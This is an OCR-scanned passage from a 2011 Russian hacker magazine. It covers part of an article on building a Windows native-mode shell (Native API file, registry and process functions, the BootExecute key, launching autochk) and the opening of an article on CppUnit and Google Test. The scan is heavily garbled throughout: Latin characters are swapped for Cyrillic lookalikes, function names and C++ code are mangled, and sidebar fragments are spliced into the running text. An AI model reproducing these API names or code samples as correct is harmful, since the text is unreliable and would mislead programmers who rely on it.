ІІБНСЖТ ІІпі'РІсІ; 

ІІБНСЖТ МакеСосІе; 

ІІБНСЖТ Р1а§з; 

ІІБНСЖТ КезегѵесІ; 

ШОИС Ех1:гаІп-Рогта1;іоп; 

} КЕУВОАКО_ІНРІІТ_ОАТА^ *РКЕУВОАКО_ІНРІІТ_ОАТА; 
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Ключ реестра ВооіЕхесиІе 

Поле МакеСосІе содержит скан код нажатой клавиши, а поле Ріадз 
— необходимую дополнительную информацию о том, были ли 
нажаты одновременно 5Ы11, СМ или что-то еще. Шелл должен со- 
держать таблицу, из которой по сканкоду и флагам можно выбрать 
конкретный символ, соответствующий определенному сочетанию 
клавиш. Полученный символ можно возвратить из собственного 
аналога стандартной функции деісб. Из символов можно склады- 
вать строки, а строки — обрабатывать как команды. Среди команд, 
кслову, следует обязательно предусмотреть команду завершения 
работы шелла, чтобы ѴѴіпсіоѵѵб могла загружаться в свое обычное 
состояние. Работа Ыаііѵе-приложения завершается вызовом 
функции МНегтіпаІеРгосеззіЖСиггепіРгосеззП, 0); 

Вывод текста на экран чрезвычайно прост, он заключается в по- 
мещении в строку типа ЦІ N I С О О Е_5Т Р I N Ѳ какого-либо текста и 
последующем вызове функции ЫЮізрІауЗігіпд: 




С :\*вірт-1р 

И-Ѵ кГг-Т 

[0] С.пи'П і - мѵірр/ѵ: [гек/СК/йк] тПгеэеі5 : 1 

[н] ьувмп - мі/рі-/ѵз [2^г:/0^/б49к] ііітекіе:. 42 

[Іей] 5^512. ІА е - из/РР/Ѵ' [зъ2К/і&йк/іЭ , 00‘к] і 

[13 В] паНѵе. ехе - ѵй/РР/Ѵі І^СИК/ЗййК/ЗЭ-й-ік) ТЬгеагіз: І 




Список процессов в паііѵе-режиме 



ЭчЬгѴі Пиьлірн> 









[■) ШЙ 




.тлігНІс 


пайѵе.ехе 


5У5ТЕМ 


-*кют1 


5егѵюе5,ехе 


5У5ТЕМ 


чМітИ 

ИГІЛІЧ. 1 


5гп55,ехе 


5У5ТЕМ 


г - - - 


ІЯітАТТЪ ГИкК 



Приложение выполняется от имени пользователя 
5У5ТЕАА 



ІИ РІШССЮЕ_5ТКІІ\ІС пате 

); 



Для доступа кфайлам и каталогам используется ЫТ-формат пути. Это 
полный путь к файлу с буквой диска и префиксом \??\. Например, путь 
до файла СЛЬооІ.іпі будет выглядеть как\??\С:\Ьоо1.іпі. Привычный 
формат пути без префикса называется в терминологии Ыаііѵе АРІ 
«005-путь». Для конвертации пути из формата 005 в ЫТ существует 
функция: 



ІІІ\ІІССЮЕ_5ТКІІ\ІС ипіе; 

К1:1Іпі1:ІІпісосІе51:піп§(&ипіс і І_"Не11о, ыогіеі ! \п" ) ; 
Ы1:0І5р1ау51:гіп§(&ипіс); 

Функция поддерживаетдва управляющих символа — возврат каретки 
«\г» и перевод строки «\п». 

Операции с файлами 

Самые элементарные операции для командной строки — это ото- 
бражение текущего каталога, перемещение между ними и операции 
над файлами. В паііѵе-режиме при всехоперацияхсфайлами система 
ничего не знает о концепции «текущего каталога». Во всех файловых 
функцияхтребуется передавать полный путь, формат которого, ктому 
же, отличается от привычного. Существует функция, помогающая хра- 
нитьзначениетекущего каталога, но сцеплять это значение с именем 
файла нужно самостоятельно. 

Функции для установки и получения текущего каталога определены 
так: 

ІМТ5Ѵ5АРІ ІЛОІМС ІМТАРІ кибе1:Сиггеп1:0ігес1:огу_ІІ( 

ІАОІМС МахітитІ_еп§1:Іі., 

РІлІБТК Ви-Р-Рег 

); 

ІМТ5Ѵ5АРІ МТ5ТАТУ5 ІЧТАРІ ки5е1:Сиггеп1:0ігес1:огу_ІІ( 



ІМТ5Ѵ5АРІ ВООЬЕАМ ІМТАРІ киОоБРаІФМатеТо^РаІФМатеДД 
ІИ РСІлІБТК ОозРаІФМате, 

ОІЯ РІШССЮЕ_5ТКІМ6 ІЧІіРаІФМате, 

ОІЯ РСІлІБТК *№:Рі1еМатеРаг1:, 

ОІЯ СІЛТОІК *ОігесРопуІп-Ро 

); 

Целесообразно сохранять путь в 005-формате. Его можно показывать 
пользователю без изменений, если он хочетувидеть текущий каталог. 
При каждой файловой операции придется формировать полный І\ІТ- 
путь кфайлу вызовом соответствующей функции или прямой склейкой 
пути с префиксом. 

Одна из необходимых возможностей шелла — это выводлистинга 
каталога. Чтобы его вывести, программа должна получить список 
файлов и каталогов текущей директории. Прежде всего, надо открыть 
каталогфункцией ЫЮгеаІеРіІе с опцией РІІ_Е_и5"МЭІРЕСТ0 ПѴ и 
указанием флага ЕІІ_Е_ОІПЕСТОПѴ_ЕІІ_Е. Полученный хэндл скармли- 
вается функции ЫШиегуОігесІогуЕіІе, которой передается константа 
ЕІІеВоіЬОігесІогуІпІогтаІіоп иуказательна буфер данныхтипа ЕІІ_Е_ 
В0ТН_0ІП_ІМЕ0ПМАТЮІ\І. Структура этого типа позволяетузнать о 
файлах и каталогах все их важные параметры: имя, атрибуты, размер 
и время создания. 

Ііуресіе-Р 5-Ьгисѣ _РИЕ_ВОТН_ОІК_ІМРОКМАТІОМ 

{ 
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ЫаІіѵе-режиАЛ есть не только в \Л/іпсІоѵѵ$, но и в РеасЮЗ 



ния. В сочетании с этой константой функция получает в параметре 
РіІеІпЬгтаІіоп указатель на структуру РІІ_Е_РЕІ\ІАМЕ_ІІ\ІЕОРМАТІОІ\І. 

■Ьуресіе-Р 5-ЬгисІ: _РИЕ_КЕМАМЕ_ІМРОКМАТІОМ 

{ 

ВООІ_ЕАІ\І КерІасеІ-РЕхізІіБ; 

НАІ\ЮІ_Е Коо1:0ігес1:огу; 

Ш(Жэ Рі1еМатеІ_еп§1:Іі; 

ІлІСНАК Рі1еІ\Іате[1] ; 

} РИЕ_КЕМАМЕ_ІМРОКМАТІОМ, *РРІІЕ_КЕМАМЕ_ІМРОКМТІОІ\І; 

Структура ЕІІ_Е_РЕІ\ІАМЕ_ІІ\ІЕОРМАТЮІ\І имеет переменную дли- 
ну, зависящую от длины нового имени файла. РІужно выделить для 
структуры достаточное количество памяти. Предположим, утебя есть 
буфер І\Іе\л/ЕіІеІ\Іаппе с новым именем файла и его размер в перемен- 
ной ЕіІеІ\Іате5І2е. 



ІЛОІМС Ыехі: Е пі: гуО-р-РзеІ: ; 

ІЛОІМС Рііеіпсіех; 

І_АКСЕ_ІІМТЕСЕК Сгеа*іопТіте; 

І_АКеЕ_ІІМТЕСЕК І_а5І:Ассе55Тіте; 

І_АКСЕ_ІІМТЕ6ЕК ЬаБІіІлІпіІіеТіте; 

І_АКСЕ_ІІ\ІТЕСЕК СІіап§еТіте; 

І_АКеЕ_ІІЧТЕ6ЕК ЕпсІО-рРіІе; 

І_АКСЕ_ІІ\ІТЕСЕК АПосаІііопБііе; 

ШОМе РіІеАѢ'ЬгіЬиѣез; 

ШОМе Рі1еІ\ІатеІ_еп§1:Іі; 

ІЛОІМС ЕаБіге; 

ССНАК 5Ііог1:І\ІатеІ_еп§1:Іі; 

ІлІСНАК 5Иоп1:Мате [ 12 ] ; 

ІлІСНАК Рі1еМате[1] ; 

} Р 1 1_ Е_ВОТН_ОІ К_ІМ РОКМАТІОІ\І , 

* Р Р 1 1_ Е_ВОТН_ОІ К_ІМ РОКМАТІОМ ; 

При вызове функции ЫШиегуОігесІогуРіІе можно использовать 
параметр РеІигпБіпдІеЕпІху = ТРІІЕ, тогда за один вызов функции 
в буфер будет помещена только одна структура ЕІІ_Е_В0ТН_0ІР_ 

I N РОРМАТЮЫ, а вызвать функцию в цикле придется столько раз, 
сколько файлов в каталоге. При уста нов кетогоже параметра в ЕАІ_5Е 
функция будет вызвана всего один раз, а в буфере окажется массив 
структур. Перемещаться по нему можно, сдвигая указатель на струк- 
туру по смещению, указанному в поле ІЧехіЕпІгуОІУзеІ:. У последнего 
элемента массива значение этого поля будет І\11іи_. 

Функции для стандартныхфайловыхопераций, таких какчтение из 
файла, запись в файл и удаление файла, документированы в МБОІЧ. 
Их названия ЫіРеасІЕіІе, ЖѴѴпІеЕіІе, ІЧШеІеІеЕіІе соответственно, а 
использование мало чем отличается отпривычныхфункций ѴѴіпАРІ. 
Чтобы скопировать файл, нужно просто прочитать его из одного места 
и записать копию в другом. А вот переименование файла — более 
комплексная операция, поэтому стоит рассмотреть ее подробнее. 

Переименование файла 

Существует функция ЖБеІІпІюгпгіаІіопЕіІ.е, которая может произво- 
дить множество различных операций над файлом. Нас интересует 
операция переименования. Прототип функции выглядит так: 

І\ІТ5Ѵ5САІ_І_АРІ ІМТ5ТАТІІ5 ІЧТАРІ ^5е1:Іп^огта1:іопРі1е( 

ІИ НАІ\ЮІ_Е РіІеНапсІІе, 

ІІ\І РІО_5ТАТи5_ВІ_ОСК Іо51:а1:и5В1оск, 

ІІ\І РѴОЮ Рііеіп-Рогтаіііогь 

ІІ\І томе І_еп§‘Ыі, 

ІІМ РІІЕ^РОКМАТІОІ\І_СІ_А55 Рі1еІгѵРогта1:іопС1а55 

); 

В параметре ЕіІеІпІюгтаІіопСІ.азз передается константа 
ЕІІеРепатеІпФгппаІіоп, означающая операцию переименова- 



РРИЕ_КЕМАМЕ_ІМРОВМАТІОМ РіІеКепатеІгѵРо; 

РіІеКепатеІітРо = КІ1А11оса1:еНеар(К1:1Се1:Ргосе55Неар( ) ., 
НЕАР_2ЕК0_МЕМ0КУ, 

5І2ео-р(РИЕ_КЕМАМЕ_ІМР0КМАТІ0М) + РіІеІЧатеБіге) ; 

После выделения памяти следует скопировать буфер І\Іе\л/ЕіІеІ\Іате 
в поле структуры ЕІІеІЧате и проинициализировать другие ее поля. 
Поле РерІасеІІ'ЕхізІз определяет, заменять ли существующий файл, 
если его имя совпадаете новым именем файла при переименова- 
нии. В параметре РооШігесІогу может содержаться хэндл другой 
директории, в которой должен оказаться файл после перемещения. 
Проще оставить это поле равным І\ІІІІ_І_, ведь для перемещения файла 
в другой каталог достаточно указать в поле ЕІІеІЧате полный путь к 
новому расположению файла в ІЧТ-формате. Если осуществляется 
переименование файла, а не перемещение, в ЕІІеІЧате должно быть 
только имя файла. После инициализации структуры остается только 
вызвать функцию для осуществления операции: 

Біаіиз = М1:5е1:Іп-Рогта1:іопРі1е( 

РіІеНапсІІе., 

&ІоБ1:а1:и5В1оск^ 

РіІеКепатеІітРо., 

5І2ео-р(РІІЕ_КЕМАМЕ_ІМР0ВМАТІ0І\І)+ РіІеІЧатеБііе, 
РіІеКепатеІп-Рогтаііоп 
); 

Размер буфера ЕіІеРепатеІпІю нельзя считать равным зІ2ео1ІЕІІ_Е_ 
РЕІЧАМЕДІЧЕОРМАТІОІЧ), ведь в определении структуры неучтена 
изменчивая длина поля ЕІІеІЧате. Поэтому в четвертом параметре 
БепдИз следует передать длину структуры, к которой прибавлен раз- 
мер строки ЕІІеІЧате. 

Реестр 

Для операций с реестром используются документированные в МБРІЧ 
функции, названия которых оканчиваются на «-Кеу», например, для 
чтения из реестра используется ІЧЮиегуѴаІиеКеу. 

Науровне ІЧабѵеАРІ реестр выглядит немного нетак, какв ѴѴіп32. 
Вместо нескольких корневых псевдоключей Н К ЕѴ_ХХХ используется 
единственный ключ «\РЕѲІ5ТРУ»сдвумя подключами «\ІІ5ЕР» и «\ 
МАСНІЫЕ». Эти два ключа соответствуют «НКЕУ_ІІ5ЕР5» и «НКЕѴ_ 
І_0САІ__МАСН1І\ІЕ». Эквивалента ключу <<НКЕУ_СІІРРЕІЧТ_ІІ5ЕР>> нет, 
ветки разных пользователей следует искать в «\ІІ5ЕР». Ключу «НКЕУ_ 
СІ_А55Е5_Р00Т» соответствуют разные ветви реестра, располагаю- 
щиеся какв ветке «\ІІ5ЕР», так и в «\МАСНІІЧЕ». Еще одно отличие от 
ѴѴіпАРІ втом, что работая с реестром, мы оперируем обычнымтипом 
НАІ\ЮІ_Е, а неспециальнымтипом НКЕУ. 

Дэниэл Мэдден еще в 2006 году написал программу с открытым 
исходным кодом под названием ІЧіРедЕсІіІ — аналогстандартного 
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Шелл ТіпуККЫІ. Алекса Ионеску 

редактора реестра (гедесіі(.ехе). ІМіРедЕсІІІ использует для доступа к 
рееструтолько функции Ыаііѵе АРІ, поэтому код из программы можно 
перенести в свое собственное паііѵе-приложение. 

В библиотеке 2епѴѴіпХ также присутствует код, использующий функ- 
ции реестра. Например, функция \л/іпх_гедІ5Іег_ЬооІ_ехес_соттапсІ 
умеет, как видно из названия, прописывать команду, выполняю- 
щуюся при запуске, то есть выполнятьзапись в ключ реестра 
ВооіЕхесиІе. 

Библиотека пігед корейского программиста гобгеат содержит набор 
функций для работы с реестром — достаточно просто подключить к 
своему проекту файлы пігед.с и пІгед.Ь, и программа может в него 
читать и писать. В этой библиотеке отсутствует функция вывода спи- 
ска ключей и значений из заданной ветки реестра, но, ксчастью, ее 
несложно написать самостоятельно. 

Чтобы узнать, какие подключи естьу какого-либо ключа, используется 
функция ЖЕпитегаІеКеу. 

І\ІТ5Ѵ5САІ_І_АРІ МТБТАТЦБ ІМТАРІ І\К:ЕпитегаТеКеу( 

ІМ НАШІ_Е КеуНапбІе, 

ІЫ ІЛОІЧС Іпбех, 

ІМ КЕѴ_ІМРОКМАТІОІ\І_СІ_А55 КеуІп^огтаТіопСІазБ , 

ОІЛ РѴОЮ Кеуіп-Рогта^іоп, 

ІМ ІЛОМС І_еп§*:Іі, 

ОІЛ РІЛОІЧО Ке5и11:І_еп§1:Іі 

); 

Имена подключей будут браться из указателя на структуру КЕѴ_ 
МОВЕДЫРОРМАТІОІМ. В параметр КеуІпкгтабопСІазз записываем 
константу КеуКІосІеІпІюгтабоп, в параметр Кеуіпкгппаііоп помещаем 
указатель на структуру. Код для получения всех подключей в итоге 
будет выглядеть следующим образом: 

ІІІ_(Жі Ке5и11:І_еп§1:Іі, і = 0; 
сбаг Ьи-Р[ВІІРРЕК_5І2Е] ; 

РКЕУ_1\Ю0Е_1МР0КМАТ10М ркі = (РКЕѴ_ШОЕ_ІМРОКМАТІОМ)Ьи-р; 

ыбііе (5ТАТІІ5_51ІССЕ55 == І\І1:Епитега1:еКеу(ІіКеу, і++, 
КеуМобеІгтРогта1:іоп л ркі., ВІІРРЕК_5І2Е, &Ке5и1ТІ_еп§ТІ , і) ) 

{ 

У 

} 

Внутри этого цикла очередное имя подключа доступно какстрока 
ѴѴСНАР ркі->Ыате, ее можно выводить на экран или сохранять в 
какой-нибудь внутренний список. Похожим образом можно полу- 
чить список всехзначений, содержащихся в ключе реестра, только 
используется другая функция ЖЕпитегаІеѴаІиеКеу с константой 



КеуѴа ІиеВазісІ пбогппаііоп, а результат оказывается в структуре КЕУ_ 
ѴАШЕ_ВА5ІС_ІМЕ0РМАТЮЫ. 

рЬі = (РКЕУ_ѴАШЕ_ВА5ІС_ІМРОКМАТІОІ\І)Ьи-р; 

іл/бііе (5ТАТІІ5_51ІССЕ55 == Ш:Епитега1:еѴа1иеКеу(ІіКеу, І++, 
КеуѴаІиеВазісІп-РогтаІііоп ,, рЬі, В11РРЕК_512Е^ &Ке5и11:І_еп§1:Іі) ) 

{ 

} 

Имя находится в строке рЬі->Ыате, а тип значения (РЕѲ_52, РЕѲ_ 
0ѴѴ0Р0 или другой) определяется в рЬі- >Туре. 

Запуск процессов 

Неплохо иметь в шелле возможность запускать другие процессы. Это 
сразу расширяет применяемость программы, ведь если программа 
может за пускать процессы, ее функциональность уже не ограничена 
операциями, зашитыми в ее код. Дальнейшее расширение доступных 
действий в паііѵе-режиме можно осуществлять разработкой новых 
программ. Да и запускать пабѵе-приложения, поставляемые с опера- 
ционной системой, тоже можно. В загрузочном режиме невозможен 
за пуск ѴѴіп32- приложен ий, та к как процессы подсистемы ѴѴіп32 при 
создании требуютуведомления СЭРЭЭо новом процессе (а он еще 
неактивен). Поэтому подавляющее большинствоутилитѴѴіпбоѵѵз 
запуститься не смогут, за исключением лишь немногих программ, 
таких какаиіоебк.ехе, аиЫппЕехе (аналоги ѴѴіп32-утилитсІпксІ5к.ехе 
и к> гт а Вехе для проверки и форматирования диска), зпМауесІ.ехе 
(программа отложенных операций сфайлами). 

Чтобы запустить из паііѵе-программы другую та кую же программу, ис- 
пользуется функция РиСгеаІеІІзегРгосезз. Ей передаются параметры 
запускаемого процесса в виде структуры типа РТЕ_ІІВЕР_РР0СЕ55_ 
РАРАМЕТЕР5, которая инициализируется специальной функцией 
РиСгеаІеРгосеззРагатеІегз. Именно в эту структуру помещают 
полный путь кисполняемому файлу в ЫТ-формате, название для ото- 
бражения в списке процессов и командную строку приложения. 

После запуска функция помещает параметры процесса в заранее 
приготовленный буфер РТЕ_ІІ5ЕР_РР0СЕ55_ІМЕ0РМАТІ0М. Отту- 
да берется тред потока и передается в функцию ЖНезитеТИгеасІ, 
чтобы поток начал выполняться. С этого момента новый процесс 
запущен. 

Передзапуском процесса неплохо бы отключаться отобработки 
клавиатуры, то есть закрыть ее хэндл, а также хэндл обработки ее со- 
бытий. Это позволит вновь запущенному приложению обрабатывать 
клавиатуру самостоятельно, без дублирования обработки в шелле. 
Восстанавливать контроль над клавиатурой можно после заверше- 
ния запущенного процесса. Чтобы дождаться завершения процесса, 
нужно всего лишь извлечь его хэндл из поля РгосеззНапбІе структу- 
ры РТЕ_ІІ5ЕР_РВ0СЕ35_ІМР0РМАТІ0М и передать его в функцию 
ЖѴѴаііРогЗіпдІеО^'есІ:, которая приостановитвыполнениетекущего 
процесса до завершения запущенного. 

Для проверки возможности запуска процессов можно запустить 
аиіоебк.ехе так, чтобы запустилась проверка системного диска. Для 
этого следует в РиСгеаІеІІзегРгосезз передать следующие строки: 

• имя для отображения в списке процессов: аіЛосбк.ехе 

• командная строка: аіЛосЬк.ехе/р\??\С: 

• полный путь:\??\С:\\л/іпбо\л/з\зу5І;ет32\аи1;осІпк.ехе 

Итог 

Ыаііѵе- приложения — это самый низкий уровень взаимодействия 
приложения с системой в пользовательском режиме. Режим 
паііѵе-загрузки сочетает в себе почти неограниченный доступ к 
потрохам системы с возможностью выполнять различные действия 
в интерактивном режиме. Я уверен, что освоив написание программ 
на чистом Ыаііѵе АРІ, ты найдешьдля них множество интересных 
применений. т 



ХАКЕР 04 /147/ 201 1 



► 115 




Программерские 
типсы и триксы 




О Ошибки есть в любых программах. В одних больше, в других меньше, но они есть. Для отлова 
багов все программисты тестируют свои творения, проверяя корректность работы кода в тех или 
иных условиях. Но чем больше и сложнее проект, тем труднее заниматься поиском ошибок и ре- 
факторингом, поэтому было придумано модульное тестирование. 



В чемже состоитосновная суть технологии юнит-тестирования? Ее 
реализация подразумевает под собой разбиение кода на изолиро- 
ванные части и тестирование каждой из них по отдельности. Конечно, 
подвергать проверке стоиттолько более-менее сложные куски кода 
твоей программы, писать тесты для функции умножения натурального 
числа на два не стоит. 

Такой подход позволяет программистам без страха вносить изме- 
нения в уже существующий код, не опасаясь его регрессии, то есть 
появления новых ошибок в уже оттестированных местах программы. 
Помимо этого можно добиться значительной экономии человеко- 
часов на этапетестирования кода, ведь каждый матерый кодер знает, 
что на отлов багов и всяческие проверки уходит до 80% времени, 
затраченного на проект в целом. 

Преимущества 

юнит-тестирования 

Помимотого, что ипіі-тесты дают программистууверенность при ре- 
факторинге кода и расширении его функциональности, есть еще ряд 
плюсов, о которых стоит рассказать. Прежде всего, это отделение ин- 
терфейса от реализации. Очень часто одни классы используют функ- 
ции других. Это абсолютно нормально, но в модульном тестировании 
такое недопустимо. Если мы проверяем работу какого-либо класса, то 
эта проверка не должна распространяться на другие. Например, если 
тестируемый класс пользуется базой данных, то в ипіЫезІ мы должны 
абстрагироваться отнее, заменив БД заглушкой. Такой подход при- 
водит к менее связному коду и минимизируетзависимости в системе, 
что является несомненным преимуществом — ошибка в одном месте 
программы не приводит к багам в другом. 

Также ипіі-тесты можно использовать как«живую» документацию к 
существующему коду. Проще говоря, в качестве примеров. Програм- 
мисту, который в дальнейшем будет сопровождать наш код, не соста- 
вит особого труда разобраться во всем хитроумном плане (ктомуже, 
через полгода-год можно и самому забыть, какже эта штука должна 
работать и что с ней надо делать). 

Ну и наконец, подобныетесты помогаютболее четко представить 
задачи, стоящие перед кодером, приводятего мозгвтонус и помогают 
войти в рабочий ритм. 

Немного тонкостей 

В идеальном случае юнит-тесты следует писать на этапе проектирова- 
ниятого или иного модуля. То есть, сначала мы определяем функцио- 
нальность класса/модуля, затем пишем тесты под него и только потом 
основной код. Время на разработку в этом случаеувеличивается, но 
зато значительно повышается эффективность. Это называется «раз- 
работка через тестирование». 



В среднем на одну строчку основного кода приходится три строки с 
тестовым. Некоторые подумают, чтотакиеусилия себя не оправдыва- 
ют, и возможно даже будут правы. Дело в том, что модульное тестиро- 
вание стоит при менять только в том случае, если оно снижает время 
на отладку, дает возможность поиска ошибокс меньшими затратами, 
нежели при других подходах, или обеспечивает дешевый поискоши- 
бокпри изменениях кода в дальнейшем. 

Кроме этого, использовать юнит-тесты крайне желательно с какой- 
нибудь системой контроля версий — например, 5ѴІ\І. В случае 
обнаружения проблем мы всегда сможем откатиться назад и начать 
все заново. 

Автоматизация в этом процессе крайне важна. Скажем, можно напи- 
сать скрипты, которые каждую ночь будут загружать из хранилища по- 
следние версии исходников, компилировать их, проводить модульное 
тестирование и прочее. Наутро будетвидно, насколько удачно прошел 
предыдущий день. 

Но эта статья не протехнологию ипіі-тестирования. В сети достаточно 
материалов, чтобы подробно ознакомиться со всеми нюансами мо- 
дульного отлова багов. Мы же сегодня рассмотрим готовые фрейм- 
ворк для С++, которые служат основой для юнит-тестов. 

Сррііпіі 

Наверное, один из самых известных ипіМезІ фреймворков для С++. 

Он основан на ЛІпГі — библиотеке для модульного тестирования под 
^ѵа. Несмотря на свою высокую популярность, Сррііпіі; является 
достаточно сложной системой, и чтобы начать работать, придется 
прочитать изрядное количество документации. 

Давай попробуем немного разобраться с ним. Для написания про- 
стейшего теста нам понадобится класс ТезіСазе, который будет 
служить базовым для уже реального тестового класса. Унаследовав 
ТезіСазе, мы должны переопределить метод гипТезД), который и будет 
выполнять основную работу. 

Использование СррІІпіІиТезіСазе 

с1а55 СотрІехІМитЬегТезі : риЫіс Сррііпіі : :Те5іСазе 

{ 

риЫіс : 

Сотр1ехІ\ІитЬегТе5і( зісі::5ігіп§ пате ) : 

Сррііпіі: :Те5іСазе( пате ) 

{ 

} 

ѵоісі пипТе5і() 

{ 

СРРІШТ_А55ЕКТ( Сотріех (10, 1) == Сотріех (10, 1) ); 
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Сайт СррІІпіі Официальная страница боодіе С++ Тезгіпд Ргатеѵѵогк 



ѵоісі БеіІІрО 

{ 

т_10_1 = пеы Сотр1ех( Ѵд, 1 ); 
т_1_1 = пем Сотр1ех( 1, 1 ); 
т_11_2 = пем Сотр1ех( 11, 2 ); 

} 



Ссылки 



• Официальная страница боодіе С++ТезІіпд Ргатеѵѵогк: 

собе.доодіе.сот/р/доодіеіезі : 

• Официальная страница СррІІпіі: 
тесІіаѵѵікі/сррипіі/іпсІех.рЬр . 



СРРІІІ\ІІТ_А55ЕКТ ( ! (Сотріех (1, 1) == Сотріех (2, 2)) ); 

} 

}; 

Вроде бы все просто, но если мы хотим выполнить много разных 
маленькихтестов для одного итого же набора данных, то нам понадо- 
бится класс ТезіРіхІиге в связке с ТезіСаІІег. 

ТезіРіхІиге позволяетзадать набор начальных данных, на которых 
будут производиться тесты. Делается это с помощью переопределе- 
ния функции -члена зеШр(). В случае, если нам понадобится убрать за 
собой (например, освободив выделенную память), можно воспользо- 
ваться методом ІеагОоѵѵпО, в коде которого нам нужно будет вы- 
полнить необходимые действия. Для самихтестов следует написать 
свои методы. Их может быть сколько угодно, и названия этих функций 
произвольны. 

Использование СррІІпіі:: іТезіРіхІіиге 

сІаББ Сотріех 

{ 

ТгіепсІ Ьооі орегаіог ==(соп5і Сотр1ех& а, сопбі: Сотр1ех& Ь); 
сІоиЫе геаі, іта§іпагу; 

риЬІіс : 

Сотр1ех( сІоиЫе г, сІоиЫе і = 0 ) 

: геаі(г), 
іта§іпагу(і) 

{ 

} 

}; 

Ьоо: орегаіог ==( сопбі: Сотріех &а^ сопбі: Сотріех &Ь ) 

{ 

геіигп а. геаі == Ь.геаі && а.іта§іпагу == Ь.іта§іпагу; 

} 

сіазз СотрІехІМитЬегТеБІ: : 
риЬІіс СррІІпіі:: ТезіРіхІиге 

{ 

ргіѵаіе: 

Сотріех *т_10_1, *т_1_1, *т_11_2; 

риЬІіс : 



ѵоісі іеагОомп() 

{ 

сіеіеіе т_10_1; 
сіеіеіе т_1_1; 
сіеіеіе т_11_2; 

} 

}; 

Чтобы за пустить тесты на выполнение, нам понадобится класс 
ТезіСаІІег. Это шаблонный класс, созданный в примере выше, кото- 
рый использует наследников ТезіРіхІиге. Конструктор ТезіСаІІег при- 
нимает в качестве аргументов два параметра, один из которых — это 
имятеста, а второй —указатель на метод, выполняющий непосред- 
ственные проверки. Для наглядности немного кода: 

Использование СррІІпіі:: ТезіСаІІег 

сіазз СотрІехІМитЬегТеБІ : 
риЬІіс СррІІпіі:: ТезіРіхІиге 

{ 

риЬІіс : 



ѵоісі іезіЕдиаІііуО 

{ 

СРРІІІ\ІІТ_А55ЕКТ( *т_10_1 == *т_10_1 ); 
СРРІІІ\ІІТ_А55ЕКТ( ! (*т_10_1 == *т_11_2) ); 

} 

ѵоісі іезіАсІсІіііоп() 

{ 

СРРІІІ\ІІТ_А55ЕКТ( *т_10_1 + *т_1_1 == *т_11_2 ); 

} 

}; 

СррІІпіі:: :Те5іСа11ег<Сотр1ехІ\ІитЬегТе5і> іезі( 

"іеБіЕдиаІііу"., &Сотр1ехІ\ІитЬегТе5і : :іезіЕдиа1ііу 

); 

СррІІпіі:: ТезіКезиІі гезиіі; 
іезі.гип( &гези1і ); 
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ѴѴікіресІіа о модульном тестировании 



То, что мы сейчас сделали, втерминологии Сррііпіі называется Тез! 
Сазе. Использовать Тез! Сазе в качестве основного механизма вы- 
зова тестов — не оченьхорошее решение. Во-первых, мы неувидим 
никакой информации о том, как протекает тестирование, а во-вторых, 
ТезіСаІІегработаеттолько с одним изтестов. Нотест-кейсы можно 
объединить в Зиііе с помощью класса СррІІпіІ::Тезі5иіІе. Для этогоу 
него имеется специальный метод асИТезІ, принимающий в качестве 
параметра указатель на объекттипа ТезіСаІІег. 

Использование СррІІпі-Ь : :Тезі5иііе 

Сррііпіі: :Тезі5иііе зиііе; 

Сррііпіі: :ТезіКези1і гезиіі; 

зиііе.асІсІТе5і( пеы Сррііпіі:: :ТезіСа11ег<Сотр1ехІ\ІитЬегТезі>( 
"іезіЕдиаІііу"., 

&Сотр1ехІ\ІитЬегТезі : :іезіЕдиа1ііу ) ); 

зиііе.асІсІТе5і( пеы Сррііпіі: :ТезіСа11ег<Сотр1ехІ\ІитЬегТезі>( 
"іезіАсІсІіііоп", 

&Сотр1ехІ\ІитЬегТезі : :іезіАсІсІіііоп ) ); 

зиііе.гип( &гези1і ); 

В свою очередь, запустить все наборы тестов (Тез! ЗиЛе) поможет 
класс ТезіРиппег. С помощью метода асИТезІ мы добавляем в ранер 
нужные нам сьюты. Но добавляем не просто так, а с помощью статиче- 
ского метода зиііе, который возвращаетуказатель на объектТезіЗиіІе. 

Использование Сррііпіі: :ТезіКиппег 

сіазз СотрІехІМитЬегТезі : 

риЬІіс Сррііпіі : :ТезіРіхіиге { 

риЬІіс : 

зіаііс Сррііпіі: :Тезі *зиііе() 

{ 



Сррііпіі: :Тезі5иііе *зиііеОТТезі5 = 

пем Сррііпіі : :Тезі5иііе( "СотрІехІМитЬегТезі" ); 

5иііеОТТезіз->асІсІТе5і( 

пем Сррііпіі: :ТезіСа11ег<Сотр1ехІМитЬегТезі>( 
"ІезіЕдиаІііу" ,, 

&Сотр1ехІМитЬегТезі: :іезіЕдиа1ііу ) ); 

зиііеОТТезі5->асІсІТе5і( 

пеы Сррііпіі: :Те5іСа11ег<Сотр1ехІ\ІитЬегТе5і>( 
"іезіАсІсІіііоп'З 

&Сотр1ехІМитЬегТезі : :іезіАсІсІіііоп ) ); 
геіигп зиііеОТТезіз; 

} 

}; 

іпі таіп( іпі а г§с, сбаг **аг§ѵ) 

{ 

Сррііпіі: :ТехіІІі: :ТезіКиппег гиппег; 
гиппег.асІсІТе5і( ЕхатрІеТезіСазе: :зиііе() ); 
гиппег. асИТезі( СотрІехІМитЬегТезі: :зиііе() ); 
гиппег. гип(); 

геіигп 0; 

} 

Воттакая краткая инструкция по использованию этого фреймворка. В 
документации к нему есть еще множество нюансов, которые помогут 
максимально подстроить тесты под любые нужды. Но, какя уже сказал 
выше, придется много читать. 

Ооодіе С++ Тезііпд Ргатеѵѵогк 

Еще один популярный фреймворкдля модульного тестирования — 
Ооодіе С++ Тезііпд Ргатеѵѵогк. Гугл выложил его в публичный доступ 
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под ВСй-лицензией в середине 2008 года, и стех пор он достаточно 
быстро набрал армию поклонников. 

Ѳоодіе Тез! (будем называть еготакдля краткости) основан на 
методологии хііпіі, что делает его очень похожим на СррІІпіЕ Но,в 
отличие от последнего, гугловские тесты проще в использовании, 
а потому позволяют сосредоточиться на разработке кода тестовых 
функций, а не инфраструктуры для их использования. 

Как и в Сррііпіі, минимальной единицей тестирования являет- 
ся одиночный тест. Каждый тест основан на утверждении в виде 
макроса — например, А88ЕРТ_ТРІІЕ или ЕХРЕСТ_6Е. Утвержде- 
ния бывают фатальные и не фатальные. Фатальные макросы вида 
А88ЕРТ_ххх приводят костановке процесса тестирования, а не- 
фатальные (или мягкие) утверждения вида ЕХРЕСТ_ххх позволяют 
довести тесты до конца, просто выводя информацию об ошибке. 

Для создания одного элементарного теста нам понадобится макрос 
ТЕ8Т. Первым его параметром является имя набора теста, а вторым 
— имя теста. Тесты, схожие по смыслу, должны группироваться в 
наборы. Для примера взглянем на код: 

Использование макроса ТЕ5Т() 

іпі: Расіогіа1( пі п); // Считает факториал п 

